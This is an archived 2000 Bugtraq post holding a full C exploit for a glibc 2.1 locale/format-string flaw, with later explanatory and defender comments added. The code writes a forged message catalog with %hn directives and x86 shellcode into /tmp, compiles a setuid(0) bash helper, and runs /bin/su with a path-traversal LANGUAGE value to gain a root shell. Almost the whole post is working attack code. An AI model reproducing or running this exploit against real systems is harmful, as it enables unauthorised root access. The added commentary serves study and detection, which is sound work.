[16653] in bugtraq


glibc language

daemon@ATHENA.MIT.EDU (Maurycy Prodeus)
Thu Sep 7 20:53:23 2000

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.3.96.1000907235942.5333A-100000@sv>
Date:         Fri, 8 Sep 2000 00:00:45 +0200
Reply-To: Maurycy Prodeus <z33d@ETH-SECURITY.NET>
From: Maurycy Prodeus <z33d@ETH-SECURITY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

/*
 * "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)"
 *						- greg@tenet.pl -
 *
 * GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000
 * with bypassing Solar Designer Stack Patch
 *
 * Dedicated to greg@tenet.pl
 *
 * It doesn't work. ;> Try using gdb to find the special value.
 * Tested on Debian 2.1/2.2 ziemniak
 * Greetz:
 *  - abusers from if.pwr.wroc.pl :))) (IF-NET)
 *  - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :)
 *  - lcamtuf - argante rulz :)
 *  - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc...
 *    :))))))))))))))))))))))
 *  - secure@poz.sm.pl no i wogole #sigsegv
 *    funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
 *  - breslau killers z vx na czele :>
 *  - ppl from my so called real life
 *  - kefir truskawkowy
 * most code I ripped :>
 */

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

// Number of 'A' padding bytes appended in main() after the two
// "AAAA"+address pairs; tunes where the addresses land on the stack.
#define DEFAULT_ALIGNMENT                 2
// Initial value of retloc: the stack address main() embeds (little-endian)
// into the argument handed to su.  argv[1] (hex) overrides it.  The two
// commented-out values below are earlier guesses; the header says it was
// tuned on Debian 2.1/2.2 and still "doesn't work" elsewhere.
// #define DEFAULT_RETLOC           0xbfffd2ff
// #define DEFAULT_RETLOC	    0xbffff798
#define DEFAULT_RETLOC	0xbffff770
// Size of buff1 in main(); it receives num*4 bytes of "%.8x" directives
// plus the sprintf() tail, and nothing checks that this fits.
#define DEFAULT_BUFFER_SIZE            2048
// Directory created under world-writable /tmp to hold the forged catalog.
#define PATH             "/tmp/LC_MESSAGES"

// Payload bytes that main() passes verbatim (via %s) into the catalog's
// msgstr.  As far as the listing shows: a run of 0x90 (x86 NOP) bytes,
// the five-byte marker "dupaa" (presumably a search/alignment aid — the
// original does not explain it), then machine code whose trailing string
// is "/tmp/sh", the helper built from sh[] below.  The bytes are not
// annotated further here.
// Defender note: msgfmt stores this as plain data, so the produced
// libc.mo carries a NOP run and a /tmp path in clear — an easy artefact
// to flag in a message catalog.
char shellcode[]=
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"dupaa"
        "\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
        "\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
// very special shellcode, 15 min ;> big thanks to yeti

// Source text of the helper that main() writes to /tmp/sh.c and compiles
// with "cd /tmp;gcc sh.c -o sh".  It calls setuid(0)/setgid(0) and then
// system("/bin/bash").  setuid(0) only succeeds when the caller already
// runs with effective uid 0, i.e. it is meant to be reached from the
// privileged su process, not to be useful on its own.  Neither call's
// return value is checked.
char sh[]=
"#include <stdlib.h>\n"
"#include <stdio.h>\n"
"#include <unistd.h>\n"
"int main(){\n"
"setuid(0);\n"
"setgid(0);\n"
"system(\"/bin/bash\");\n"
"}\n";

/*
 * Entry point.  Writes a message catalog whose msgstr consists of
 * printf-style directives (buff1) followed by the bytes of shellcode[],
 * compiles it with msgfmt under /tmp/LC_MESSAGES, builds the /tmp/sh
 * helper from sh[], and finally runs /bin/su with a LANGUAGE value that
 * climbs out of the system locale tree with "..", so that su's
 * "%s: invalid option -- %c" message (presumably triggered by the
 * unrecognised "-u") is taken from the forged catalog.  argv[1] (hex)
 * overrides the stack address embedded in su's argument, argv[2] the
 * number of "%.8x" directives.  The header says it does not work as-is.
 *
 * Reviewer notes (code left byte-identical):
 *  - memset/memcpy/sprintf are used without <string.h>, relying on an
 *    implicit declaration (removed in C99, an error in C23).
 *  - sscanf("%x") and printf("%x") are applied to a long; the specifier
 *    expects (unsigned) int, so this is undefined behaviour except where
 *    int and long happen to coincide in size, as on the 32-bit targets
 *    named in the header.
 *  - open/fstat/lseek/write/mkdir/chdir/system results are never checked.
 *  - All files live at fixed paths under world-writable /tmp, created
 *    without O_EXCL; any other local user can pre-create or swap them.
 * Defender note: the two properties being relied on are a privileged
 * program honouring a caller-supplied LANGUAGE that contains path
 * separators, and a translated format string being used without checking
 * its directives against the original's.  Catalog files under /tmp, or
 * msgfmt and gcc being spawned from an unprivileged session, are the
 * visible artefacts.
 */
int main(int argc, char *argv[]) {
  char *buff, *buff1, *ptr;
  char *env[3];                       // only env[0] and the NULL terminator are used
  long shell_addr,retloc=DEFAULT_RETLOC;   // retloc: address the %hn writes presumably target; shell_addr: value to be written
  int align=DEFAULT_ALIGNMENT;
  int bsize=DEFAULT_BUFFER_SIZE;
  int i,reth,retl,num=132; // maybe 121
  struct stat j;                      // never initialised; only filled if fstat() succeeds
  FILE *fp;

  if (argc > 1) sscanf(argv[1],"%x",&retloc);   // NOTE(review): %x expects unsigned int *, retloc is long
  if (argc > 2) num = atoi(argv[2]);            // no range check despite the usage text below


  printf("Stay sharp ...\n");
  printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]);

  if (!(buff = malloc(1024))) {
       printf("Can't allocate memory.\n");
       exit(0);                       // NOTE(review): exits with success status on failure
    }

  if (!(buff1 = malloc(bsize))) {
       printf("Can't allocate memory.\n");
       exit(0);
    }

    printf("Using RET location address: 0x%x\n", retloc);   // NOTE(review): %x with a long argument
    shell_addr=0x00124270; // or 0x00124250
    printf("Using Shellcode address: 0x%x\n", shell_addr);

    // Split the value into two 16-bit halves, one per %hn write below.
    reth = (shell_addr >> 16) & 0xffff ;
    retl = (shell_addr >>  0) & 0xffff ;

    ptr = buff;

    // buff: twice "AAAA" followed by retloc as 4 little-endian bytes,
    // the second copy with retloc+2 (the high half's address).
    for (i = 0; i <2 ; i++, retloc+=2 ){
       memset(ptr,'A',4);
       ptr += 4 ;
       (*ptr++) =  retloc & 0xff;
       (*ptr++) = (retloc >> 8  ) & 0xff ;
       (*ptr++) = (retloc >> 16 ) & 0xff ;
       (*ptr++) = (retloc >> 24 ) & 0xff ;
      }

     memset(ptr,'A',align);           // padding; buff is never NUL-terminated explicitly (malloc'd memory is not zeroed)

     ptr = buff1;

     // buff1: num copies of "%.8x".  Each one consumes one argument slot and
     // expands to exactly 8 characters, hence the num*8 below.
     for(i = 0 ; i < num ; i++ )
     {
        memcpy(ptr, "%.8x", 4);
        ptr += 4;
     }

     // Tail: "%<w1>c%hn%<w2>c%hn".  After num*8 + w1 characters the running
     // count equals retl, after a further w2 it equals 0x10000 + reth, which
     // %hn truncates to reth.  No check that the result fits in buff1 or
     // that retl - num*8 is non-negative before being printed with %u.
     sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
              (0x10000 + reth - retl));


    mkdir(PATH,0755);                 // unchecked; a pre-existing directory is silently reused
    chdir(PATH);                      // unchecked; on failure libc.po is written into the cwd instead
    fp = fopen("libc.po", "w+");
    if (!fp){
      printf("Skript kidies ?\n");
      exit(0);
    }
    // msgid must equal the program's original string for gettext to pick
    // this entry; the directives in buff1 go into the catalog as data via %s.
    fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
    fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode);
    fclose(fp);
    system("/usr/bin/msgfmt libc.po -o libc.mo");   // relies on the chdir above

    // Patch the compiled catalog: six zero bytes written from 2 bytes
    // before EOF.  Why is not stated in the original.  If open() fails,
    // i == -1, fstat() fails and j.st_size is read uninitialised.
    i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR);
    fstat(i,&j);
    lseek(i,j.st_size-2,SEEK_SET);
    write(i,"\0\0\0\0\0\0",6);
    close(i);

    fp = fopen("/tmp/sh.c","w+");
    if (!fp){
      printf("Skript kidies ?\n");
      exit(0);
    }
    fprintf(fp,"%s",sh);
    fclose(fp);
    system("cd /tmp;gcc sh.c -o sh");   // shell-spawned build of the helper from sh[]

    // Locale name followed by ".." segments, presumably so the catalog
    // directory resolves to /tmp/LC_MESSAGES rather than the system tree.
    env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
    env[1] = (char *)0 ;

    // buff (the "AAAA"+address bytes) becomes su's argument after "-u".
    execle("/bin/su","su","-u", buff, NULL,env);
    perror("execle");                 // only reached if the exec itself fails
    return 0;
}
- z33d -

--
		  Freestate
		Let yourself go
		Let yourself go
		Let your senses overflow

		Step out of your cage
		And onto the stage
		It's time to start
		Playing your part
		Freedom awaits
		Open the gates
		Open your mind
		Freedom's a state
			/ Depeche Mode
